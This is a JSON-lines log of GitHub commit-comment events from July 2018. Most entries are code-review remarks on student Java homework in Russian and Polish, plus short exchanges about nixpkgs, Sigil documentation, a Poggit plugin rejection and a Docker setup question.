{"id":"7967159961","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29712268,"position":null,"line":null,"path":null,"commit_id":"af1313e91552e42a4419b396b3026319c60fc17f","created_at":"2018-07-15T10:36:00Z","updated_at":"2018-07-15T10:36:00Z","author_association":"MEMBER","body":"That's a pity. Fixed in f981bade21f54cb70851072c2dc770a2d43eb904.\r\nMaybe an ofborg check for that hash would be nice. cc @grahamc "}},"created_at":"2018-07-15T10:36:00Z"}
{"id":"7967161263","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712272,"position":38,"line":38,"path":"src/homeWork/hw2/TaskThree.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:37:09Z","updated_at":"2018-07-15T10:37:09Z","author_association":"NONE","body":"такие простые логические условия не надо в скобочки вставлять"}},"created_at":"2018-07-15T10:37:09Z"}
{"id":"7967161416","type":"CommitCommentEvent","actor":{"login":"Juncus"},"repo":{"name":"Sigil-Ebook/Sigil"},"payload":{"comment":{"id":29712273,"position":null,"line":null,"path":null,"commit_id":"6e1594eea61661dfd56b28e99358c14cbe8904db","created_at":"2018-07-15T10:37:18Z","updated_at":"2018-07-15T10:37:18Z","author_association":"NONE","body":"Why is this not downloadable. Saving link as only gives an .htm ?"}},"created_at":"2018-07-15T10:37:18Z"}
{"id":"7967161938","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712276,"position":46,"line":46,"path":"src/homeWork/hw2/TaskThree.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:37:47Z","updated_at":"2018-07-15T10:37:47Z","author_association":"NONE","body":"валидацию входных параметров надо делать в самом начале"}},"created_at":"2018-07-15T10:37:47Z"}
{"id":"7967162541","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712278,"position":49,"line":49,"path":"src/homeWork/hw2/TaskThree.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:38:21Z","updated_at":"2018-07-15T10:38:21Z","author_association":"NONE","body":"тут просто else "}},"created_at":"2018-07-15T10:38:21Z"}
{"id":"7967163084","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712279,"position":39,"line":39,"path":"src/homeWork/hw2/TaskTwo.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-15T10:38:51Z","updated_at":"2018-07-15T10:38:51Z","author_association":"NONE","body":"сложно написано, разбивать на функции надо, иначе нечитабельно"}},"created_at":"2018-07-15T10:38:51Z"}
{"id":"7967164640","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712280,"position":19,"line":19,"path":"src/homeWork/hw3/TaskTwo.java","commit_id":"6cabce33996adfccb4dd75624932c91c08fe2370","created_at":"2018-07-15T10:40:19Z","updated_at":"2018-07-15T10:40:19Z","author_association":"NONE","body":"null - это не zero)"}},"created_at":"2018-07-15T10:40:19Z"}
{"id":"7967165519","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29712282,"position":12,"line":12,"path":"src/homeWork/hw3/TaskTwoReursive.java","commit_id":"6cabce33996adfccb4dd75624932c91c08fe2370","created_at":"2018-07-15T10:41:05Z","updated_at":"2018-07-15T10:41:05Z","author_association":"NONE","body":"по условию задачи надо было вывести числа до тех пор, пока они меньше n, а у тебя иначе"}},"created_at":"2018-07-15T10:41:05Z"}
{"id":"7967166232","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29712284,"position":null,"line":null,"path":null,"commit_id":"4cbfada53cedc09c44678afb345e43eacbab275e","created_at":"2018-07-15T10:41:47Z","updated_at":"2018-07-15T10:41:47Z","author_association":"CONTRIBUTOR","body":"`depends_patch` was part of MacPorts 2.5.0 released May 28. I made the change on June 22. That should have been enough time for everyone to see the \"it's been 2 weeks since you last ran selfupdate\" message."}},"created_at":"2018-07-15T10:41:47Z"}
{"id":"7967167121","type":"CommitCommentEvent","actor":{"login":"pinguinosod"},"repo":{"name":"cryptoluka/lukapeersbackend"},"payload":{"comment":{"id":29712286,"position":null,"line":null,"path":null,"commit_id":"75f04ef33eda0783b9e13439148870f6e751c4b7","created_at":"2018-07-15T10:42:35Z","updated_at":"2018-07-15T10:42:35Z","author_association":"CONTRIBUTOR","body":"Hey @vitorgamer58, it seems you didn't put the link to the tutorial, would you mind sending the link? :smile: \r\nThank you! :+1: "}},"created_at":"2018-07-15T10:42:35Z"}
{"id":"7967167184","type":"CommitCommentEvent","actor":{"login":"dariusztu"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712287,"position":14,"line":14,"path":"src/test/java/pages/HomePage.java","commit_id":"651b8d4635be41367b9ced8816f5f6c8688f4f8e","created_at":"2018-07-15T10:42:38Z","updated_at":"2018-07-15T10:42:38Z","author_association":"OWNER","body":"URL can be stored in String."}},"created_at":"2018-07-15T10:42:38Z"}
{"id":"7967167261","type":"CommitCommentEvent","actor":{"login":"mmojek"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712288,"position":27,"line":131,"path":"src/test/java/CartObjects.java","commit_id":"02b1bce0c8b51934c6af9caa544fcbd32ee4753a","created_at":"2018-07-15T10:42:41Z","updated_at":"2018-07-15T10:42:41Z","author_association":"COLLABORATOR","body":"element z malej litery"}},"created_at":"2018-07-15T10:42:41Z"}
{"id":"7967169623","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29712292,"position":null,"line":null,"path":null,"commit_id":"3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9","created_at":"2018-07-15T10:44:54Z","updated_at":"2018-07-15T10:44:54Z","author_association":"NONE","body":"For a super example of what I’d prefer:  https://github.com/NixOS/nixpkgs/pull/43560/files#diff-69df24a05ec3d577cb638113e9837ae1R116\n\n\n> On Jul 14, 2018, at 11:33 PM, Graham Christensen <notifications@github.com> wrote:\n> \n> I guess the long and short of it is deleting force system has broken things I depend on. That’s a bit annoying but fine. What is really like to see is docs on how to get it working again under the new system. I don’t  need to specifically use force system, but id like a notice of “hey this is gone now, read docs XYZ for how to make it work again.”\n> \n> Also note I believe I also use this for x86 -> aarch64 so I’m sort of your worst nightmare case 🙃\n> \n> > On Jul 14, 2018, at 11:20 PM, Graham Christensen <notifications@github.com> wrote:\n> > \n> > Yikes. That is tricky. Unfortunately my use was forcing x86 64 Linux from a Mac, and visa versa.\n> > \n> > I think if the deprecation error gave reasonable directions for how to go about fixing the problem, it would be okay. Right now there is no way to go from failed evaluation to how to move on with my day. \n> > \n> > > On Jul 14, 2018, at 10:41 PM, Matthew Bauer <notifications@github.com> wrote:\n> > > \n> > > aliases: add forceSystem alias for i686-linux\n> > > \n> > > forceSystem was used in various places outside of Nixpkgs. Doing it in\n> > > a generic way gets difficult due to how the system is parsed. Instead,\n> > > we just provide a value for (forceSystem \"i686-linux\" \"i386\"). Other\n> > > uses of forceSystem throw an error.\n> > > \n> > > /cc @grahamc @ericson2314\n> > > \n> > > -- \n> > > You are receiving this because you were mentioned.\n> > > Reply to this email directly or view it on GitHub:\n> > > https://github.com/matthewbauer/nixpkgs/commit/3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub, or mute the thread.\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-15T10:44:54Z"}
{"id":"7967170261","type":"CommitCommentEvent","actor":{"login":"dougmassay"},"repo":{"name":"Sigil-Ebook/Sigil"},"payload":{"comment":{"id":29712297,"position":null,"line":null,"path":null,"commit_id":"6e1594eea61661dfd56b28e99358c14cbe8904db","created_at":"2018-07-15T10:45:25Z","updated_at":"2018-07-15T10:45:25Z","author_association":"CONTRIBUTOR","body":"Github is not geared toward downloading individual files from the source tree. You will, however, find a working link to the user guide near the bottom of every Sigil release notice.\r\n\r\nIf you have general Sigil questions, you should also consider checking/joining the Sigil support forums at Mobileread.com. \r\n\r\nhttps://www.mobileread.com/forums/forumdisplay.php?f=203"}},"created_at":"2018-07-15T10:45:25Z"}
{"id":"7967170868","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712299,"position":11,"line":11,"path":"Lesson2/Lesson2.iml","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:45:55Z","updated_at":"2018-07-15T10:45:55Z","author_association":"NONE","body":"добавь плиз в корень своего проекта файлик .gitignore, а то ты пушишь ненужный код, прочти про него)"}},"created_at":"2018-07-15T10:45:55Z"}
{"id":"7967171565","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712300,"position":6,"line":6,"path":"Lesson2/src/by/rost/NextDate.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:46:31Z","updated_at":"2018-07-15T10:46:31Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T10:46:31Z"}
{"id":"7967171723","type":"CommitCommentEvent","actor":{"login":"Vajniy"},"repo":{"name":"GenaANTG/C"},"payload":{"comment":{"id":29712301,"position":null,"line":null,"path":null,"commit_id":"a1c6542e7f212701c0cfbc1742ea24568db43b20","created_at":"2018-07-15T10:46:41Z","updated_at":"2018-07-15T10:46:41Z","author_association":"NONE","body":"Привет, почему удалил задания?"}},"created_at":"2018-07-15T10:46:41Z"}
{"id":"7967171812","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712302,"position":20,"line":20,"path":"Lesson2/src/by/rost/NextDate.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:46:46Z","updated_at":"2018-07-15T10:46:46Z","author_association":"NONE","body":"не надо делать лишних отступов, сразу после if на след строчке и пиши код"}},"created_at":"2018-07-15T10:46:46Z"}
{"id":"7967172177","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712303,"position":57,"line":57,"path":"Lesson2/src/by/rost/NextDate.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:47:08Z","updated_at":"2018-07-15T10:47:08Z","author_association":"NONE","body":"стараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-15T10:47:08Z"}
{"id":"7967172447","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712304,"position":60,"line":60,"path":"Lesson2/src/by/rost/NextDate.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:47:19Z","updated_at":"2018-07-15T10:47:19Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-15T10:47:19Z"}
{"id":"7967172674","type":"CommitCommentEvent","actor":{"login":"Juncus"},"repo":{"name":"Sigil-Ebook/Sigil"},"payload":{"comment":{"id":29712305,"position":null,"line":null,"path":null,"commit_id":"6e1594eea61661dfd56b28e99358c14cbe8904db","created_at":"2018-07-15T10:47:33Z","updated_at":"2018-07-15T10:47:33Z","author_association":"NONE","body":"I was sent by the website. The website for Sigil. That is the Sigil Documentation page."}},"created_at":"2018-07-15T10:47:33Z"}
{"id":"7967172988","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712306,"position":103,"line":103,"path":"Lesson2/src/by/rost/NextDate.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:47:50Z","updated_at":"2018-07-15T10:47:50Z","author_association":"NONE","body":"default должна содержать break"}},"created_at":"2018-07-15T10:47:50Z"}
{"id":"7967173621","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"FEniCS/dolfinx"},"payload":{"comment":{"id":29712307,"position":4,"line":49,"path":"cpp/dolfin/io/XDMFFile.cpp","commit_id":"9690c078cfc749879c764e41b5709df1ad45f228","created_at":"2018-07-15T10:48:20Z","updated_at":"2018-07-15T10:48:20Z","author_association":"MEMBER","body":"The documentation says that `H5Fclose` is collective. It does not say that you should meet at a synchronization point before calling `H5Fclose`. I don't understand why you added this.\r\n\r\nIf `H5Fclose` does some MPI-collective operation, it will synchronize when/if needed.\r\n\r\nCollective operation does not mean \"put ad hoc barriers before/after calls\"."}},"created_at":"2018-07-15T10:48:20Z"}
{"id":"7967173655","type":"CommitCommentEvent","actor":{"login":"mmojek"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712308,"position":43,"line":128,"path":"src/test/java/CartObjects.java","commit_id":"02b1bce0c8b51934c6af9caa544fcbd32ee4753a","created_at":"2018-07-15T10:48:22Z","updated_at":"2018-07-15T10:48:22Z","author_association":"COLLABORATOR","body":"Nazwy metod z malej litery. Popraw tez pozostale"}},"created_at":"2018-07-15T10:48:22Z"}
{"id":"7967173857","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712309,"position":23,"line":23,"path":"Lesson2/src/by/rost/RootsFinder.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:48:32Z","updated_at":"2018-07-15T10:48:32Z","author_association":"NONE","body":"discriminant высчитывает много раз, достаточно одного и присвоить переменной, неоптимально решено"}},"created_at":"2018-07-15T10:48:32Z"}
{"id":"7967174050","type":"CommitCommentEvent","actor":{"login":"excalibur0922"},"repo":{"name":"excalibur0922/bitcash"},"payload":{"comment":{"id":29712310,"position":null,"line":null,"path":null,"commit_id":"030875e0865677061e7f7b0f2d4460e9974f3661","created_at":"2018-07-15T10:48:42Z","updated_at":"2018-07-15T10:48:42Z","author_association":"OWNER","body":"Note to self: network/services.py - was not aware that I had made the change from json --> data.\r\n-- May need to wind that back or support both cases"}},"created_at":"2018-07-15T10:48:42Z"}
{"id":"7967174447","type":"CommitCommentEvent","actor":{"login":"MarkusTiede"},"repo":{"name":"rajathie/extended-essay"},"payload":{"comment":{"id":29712311,"position":5,"line":9,"path":"main.adoc","commit_id":"c85c257a48c9d9053400186b4e11c5db2e929185","created_at":"2018-07-15T10:49:03Z","updated_at":"2018-07-15T10:49:03Z","author_association":"COLLABORATOR","body":"proof for : importance, popularity missing!"}},"created_at":"2018-07-15T10:49:03Z"}
{"id":"7967174587","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712312,"position":23,"line":23,"path":"Lesson2/src/by/rost/RootsFinder.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:49:10Z","updated_at":"2018-07-15T10:49:10Z","author_association":"NONE","body":"дано неверное название функции, я подумал, что она проверяет на > 0, а не наоборот!"}},"created_at":"2018-07-15T10:49:10Z"}
{"id":"7967174833","type":"CommitCommentEvent","actor":{"login":"j4v"},"repo":{"name":"awsdocs/elb-classic-load-balancers-user-guide"},"payload":{"comment":{"id":29712313,"position":9,"line":35,"path":"doc_source/x-forwarded-headers.md","commit_id":"0aa03ef9e048169e18e98d9cc76b32a24df6d29e","created_at":"2018-07-15T10:49:22Z","updated_at":"2018-07-15T10:49:22Z","author_association":"NONE","body":"Any reason why this section has been removed? Is this no longer the case?"}},"created_at":"2018-07-15T10:49:22Z"}
{"id":"7967174912","type":"CommitCommentEvent","actor":{"login":"dariusztu"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712314,"position":58,"line":58,"path":"src/test/java/tests/SendContactUsFormTest.java","commit_id":"651b8d4635be41367b9ced8816f5f6c8688f4f8e","created_at":"2018-07-15T10:49:26Z","updated_at":"2018-07-15T10:49:26Z","author_association":"OWNER","body":"Good test."}},"created_at":"2018-07-15T10:49:26Z"}
{"id":"7967174964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712315,"position":38,"line":38,"path":"Lesson2/src/by/rost/RootsFinder.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:49:29Z","updated_at":"2018-07-15T10:49:29Z","author_association":"NONE","body":"сразу return b * b - 4 * a * c;"}},"created_at":"2018-07-15T10:49:29Z"}
{"id":"7967175354","type":"CommitCommentEvent","actor":{"login":"Maximres"},"repo":{"name":"Maximres/EvPlanner"},"payload":{"comment":{"id":29712316,"position":4,"line":39,"path":"ThePlanner/Views/Shared/_Layout.cshtml","commit_id":"8f494fb1f4278f85e619f4e2f9c9b1b395e982a2","created_at":"2018-07-15T10:49:51Z","updated_at":"2018-07-15T10:49:51Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-15T10:49:51Z"}
{"id":"7967175543","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712317,"position":36,"line":36,"path":"Lesson2/src/by/rost/SweetHome.java","commit_id":"fbd139839decc2557999a033b1033ad8d155cff1","created_at":"2018-07-15T10:49:59Z","updated_at":"2018-07-15T10:49:59Z","author_association":"NONE","body":"по условие надо было проверять, влазят ли оба дома на заданную площадь, а не одному в отдельности"}},"created_at":"2018-07-15T10:49:59Z"}
{"id":"7967176358","type":"CommitCommentEvent","actor":{"login":"co2meal"},"repo":{"name":"BarogoTeam/serverless"},"payload":{"comment":{"id":29712318,"position":null,"line":null,"path":null,"commit_id":"181b131678ca12c97b8a87161c00acb165301e2d","created_at":"2018-07-15T10:50:39Z","updated_at":"2018-07-15T10:50:39Z","author_association":"NONE","body":"https://etrn16p7n7.execute-api.ap-northeast-2.amazonaws.com/dev/screens"}},"created_at":"2018-07-15T10:50:39Z"}
{"id":"7967176431","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712319,"position":36,"line":36,"path":"Lesson3/src/by/rost/Fibonachi.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:50:43Z","updated_at":"2018-07-15T10:50:43Z","author_association":"NONE","body":"очень много пустых строк вставляешь в коде не так, где надо"}},"created_at":"2018-07-15T10:50:43Z"}
{"id":"7967177332","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712320,"position":47,"line":47,"path":"Lesson3/src/by/rost/Fibonachi.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:51:25Z","updated_at":"2018-07-15T10:51:25Z","author_association":"NONE","body":"параметры функции должны быть неизменными, нельзя их менять в коде!"}},"created_at":"2018-07-15T10:51:25Z"}
{"id":"7967177593","type":"CommitCommentEvent","actor":{"login":"OtorisanVardo"},"repo":{"name":"OtorisanVardo/SignEdit"},"payload":{"comment":{"id":29712321,"position":null,"line":null,"path":null,"commit_id":"fbf8f7d5b3aba14114b2c4bd39e25e18c4e4a6aa","created_at":"2018-07-15T10:51:39Z","updated_at":"2018-07-15T10:51:39Z","author_association":"OWNER","body":"ok, thank you.\n\n2018-07-15 15:39 GMT+09:00 SOFe <notifications@github.com>:\n\n> Dear @OtorisanVardo <https://github.com/OtorisanVardo>:\n> I regret to inform you that the release you submitted, named \"*SignEdit*\"\n> (v1.2.4), for the project SignEdit\n> <https://poggit.pmmp.io/ci/OtorisanVardo/SignEdit/SignEdit> on\n> 2018-07-11T04:21:12.000Z, has been rejected.\n>\n> If your plugin supports 3.0.0, it automatically supports 3.0.6 too. You\n> don't need to update it.\n>\n> 4.0.0 has not been released yet, and we do not accept plugins targetting\n> 4.0.0 because the API hasn't been finalized.\n>\n> Note: This comment is created here because this is the last commit when\n> the released build was created.\n>\n> via Poggit (@poggit-bot <https://github.com/poggit-bot>)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OtorisanVardo/SignEdit/commit/fbf8f7d5b3aba14114b2c4bd39e25e18c4e4a6aa#commitcomment-29711590>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AdoHJ0pT7RFR-vMgVZZGZLr79InqJOnXks5uGuOvgaJpZM4VQIuo>\n> .\n>\n"}},"created_at":"2018-07-15T10:51:39Z"}
{"id":"7967178461","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712322,"position":38,"line":38,"path":"Lesson3/src/by/rost/Fibonachi.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:52:23Z","updated_at":"2018-07-15T10:52:23Z","author_association":"NONE","body":"давать осмысленные названия переменным и параметрам функции, иначе нечитабельно вообще, что происходит"}},"created_at":"2018-07-15T10:52:23Z"}
{"id":"7967178599","type":"CommitCommentEvent","actor":{"login":"mmojek"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712324,"position":15,"line":101,"path":"src/test/java/FunctionalTest.java","commit_id":"02b1bce0c8b51934c6af9caa544fcbd32ee4753a","created_at":"2018-07-15T10:52:32Z","updated_at":"2018-07-15T10:52:32Z","author_association":"COLLABORATOR","body":"Mozna przezucic adres URL do page objectow."}},"created_at":"2018-07-15T10:52:32Z"}
{"id":"7967179255","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712326,"position":30,"line":30,"path":"Lesson3/src/by/rost/Fibonachi.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:53:07Z","updated_at":"2018-07-15T10:53:07Z","author_association":"NONE","body":"два раза проверку делаешь в while и в if, вводит в заблуждение"}},"created_at":"2018-07-15T10:53:07Z"}
{"id":"7967179311","type":"CommitCommentEvent","actor":{"login":"mmojek"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712327,"position":23,"line":102,"path":"src/test/java/FunctionalTest.java","commit_id":"02b1bce0c8b51934c6af9caa544fcbd32ee4753a","created_at":"2018-07-15T10:53:10Z","updated_at":"2018-07-15T10:53:10Z","author_association":"COLLABORATOR","body":"Mozna przezucic adres URL do page objectow."}},"created_at":"2018-07-15T10:53:10Z"}
{"id":"7967179572","type":"CommitCommentEvent","actor":{"login":"ims21"},"repo":{"name":"OpenPLi/enigma2-plugins"},"payload":{"comment":{"id":29712328,"position":null,"line":null,"path":null,"commit_id":"24b22c5d5d7b25b69052e98634bf1087456ae33b","created_at":"2018-07-15T10:53:22Z","updated_at":"2018-07-15T10:53:22Z","author_association":"CONTRIBUTOR","body":"1) Why for added \"host name\" is not possible with \"TXT\" button switch to virtual keyboard (instead sms keyboard) as for other text items in this menu ?"}},"created_at":"2018-07-15T10:53:22Z"}
{"id":"7967179880","type":"CommitCommentEvent","actor":{"login":"mmojek"},"repo":{"name":"dariusztu/MyStore"},"payload":{"comment":{"id":29712329,"position":32,"line":111,"path":"src/test/java/FunctionalTest.java","commit_id":"02b1bce0c8b51934c6af9caa544fcbd32ee4753a","created_at":"2018-07-15T10:53:39Z","updated_at":"2018-07-15T10:53:39Z","author_association":"COLLABORATOR","body":"Bardzo dobre nazewnictwo metod testowych"}},"created_at":"2018-07-15T10:53:39Z"}
{"id":"7967180033","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712331,"position":13,"line":13,"path":"Lesson3/src/by/rost/Osadki.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:53:47Z","updated_at":"2018-07-15T10:53:47Z","author_association":"NONE","body":"зачем объявлять переменную за циклом for. Тем самым увеличиваешь область видимости ее, так делать плохо, область видимости должна быть как можно меньше, поэтому помещай ее в for"}},"created_at":"2018-07-15T10:53:47Z"}
{"id":"7967180503","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712337,"position":26,"line":26,"path":"Lesson3/src/by/rost/Osadki.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:54:10Z","updated_at":"2018-07-15T10:54:10Z","author_association":"NONE","body":"комментарии в коде можно оставлять только перед методом или перед классом, в коде их быть не должно "}},"created_at":"2018-07-15T10:54:10Z"}
{"id":"7967180516","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29712338,"position":null,"line":null,"path":null,"commit_id":"0f06e4fd306684aafccd2764b47a66d2205d10fc","created_at":"2018-07-15T10:54:11Z","updated_at":"2018-07-15T10:54:11Z","author_association":"MEMBER","body":"Closed #150 by mistake\r\n"}},"created_at":"2018-07-15T10:54:11Z"}
{"id":"7967181362","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712339,"position":29,"line":29,"path":"Lesson3/src/by/rost/Osadki.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:54:50Z","updated_at":"2018-07-15T10:54:50Z","author_association":"NONE","body":"пропадает вещественная часть, надо приводить к double"}},"created_at":"2018-07-15T10:54:50Z"}
{"id":"7967181812","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712340,"position":15,"line":15,"path":"Lesson3/src/by/rost/ValueSum.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:55:13Z","updated_at":"2018-07-15T10:55:13Z","author_association":"NONE","body":"c пустыми строками вообще завал, убираем!"}},"created_at":"2018-07-15T10:55:13Z"}
{"id":"7967182335","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Rostl/Java_Study"},"payload":{"comment":{"id":29712342,"position":18,"line":18,"path":"Lesson3/src/by/rost/ValueSum.java","commit_id":"6b9935d766d2ac5f2020f0db2330bebf81d619d4","created_at":"2018-07-15T10:55:38Z","updated_at":"2018-07-15T10:55:38Z","author_association":"NONE","body":"то же самое с параметрами функции - они неизменны!"}},"created_at":"2018-07-15T10:55:38Z"}
{"id":"7967182557","type":"CommitCommentEvent","actor":{"login":"frosty00"},"repo":{"name":"mikeyy/nonoCAPTCHA"},"payload":{"comment":{"id":29712343,"position":null,"line":null,"path":null,"commit_id":"e0cf8128352f9d3644004cc55f1a014aedd00b76","created_at":"2018-07-15T10:55:48Z","updated_at":"2018-07-15T10:55:48Z","author_association":"CONTRIBUTOR","body":"Docker noob here, tried to install this on mac and it didn't work.\r\n\r\nI ran:\r\n\r\n```docker build -t nonocaptcha .```\r\n\r\nand a new image called ubuntu was added when I do `docker image ls`\r\n\r\nCan you add some docs to README about how to use this.\r\nCheers,"}},"created_at":"2018-07-15T10:55:48Z"}
{"id":"7967183144","type":"CommitCommentEvent","actor":{"login":"kasperisager"},"repo":{"name":"w3c/wcag-act"},"payload":{"comment":{"id":29712344,"position":null,"line":null,"path":null,"commit_id":"64a34291820d39d667024714e5db6c5f2edeaef7","created_at":"2018-07-15T10:56:18Z","updated_at":"2018-07-15T10:56:18Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-15T10:56:18Z"}
{"id":"7967183731","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"q4a/xray-16"},"payload":{"comment":{"id":29712346,"position":5,"line":49,"path":"src/xrEngine/Device_Initialize.cpp","commit_id":"eef75909e0fc5bd7fb43f87ca8c7613070efa2c9","created_at":"2018-07-15T10:56:47Z","updated_at":"2018-07-15T10:56:47Z","author_association":"COLLABORATOR","body":"Will it work with DirectX?"}},"created_at":"2018-07-15T10:56:47Z"}
{"id":"7967183803","type":"CommitCommentEvent","actor":{"login":"MarkusTiede"},"repo":{"name":"rajathie/extended-essay"},"payload":{"comment":{"id":29712347,"position":10,"line":13,"path":"main.adoc","commit_id":"c85c257a48c9d9053400186b4e11c5db2e929185","created_at":"2018-07-15T10:56:51Z","updated_at":"2018-07-15T10:56:51Z","author_association":"COLLABORATOR","body":"proof for : security, active in which area?\r\n\r\nNo trying; security is a side topic\r\n\r\nIdea: why turing completeness (basic core principles of computer science) in the eVM \"can\" be game changer."}},"created_at":"2018-07-15T10:56:51Z"}
{"id":"7967184482","type":"CommitCommentEvent","actor":{"login":"mehdisagar"},"repo":{"name":"mehdisagar/modeling_CPS"},"payload":{"comment":{"id":29712348,"position":null,"line":null,"path":null,"commit_id":"f761085ff751f451863dbc7cdf8b1e000100d1b1","created_at":"2018-07-15T10:57:24Z","updated_at":"2018-07-15T10:57:24Z","author_association":"OWNER","body":"More Info. on the project!"}},"created_at":"2018-07-15T10:57:24Z"}
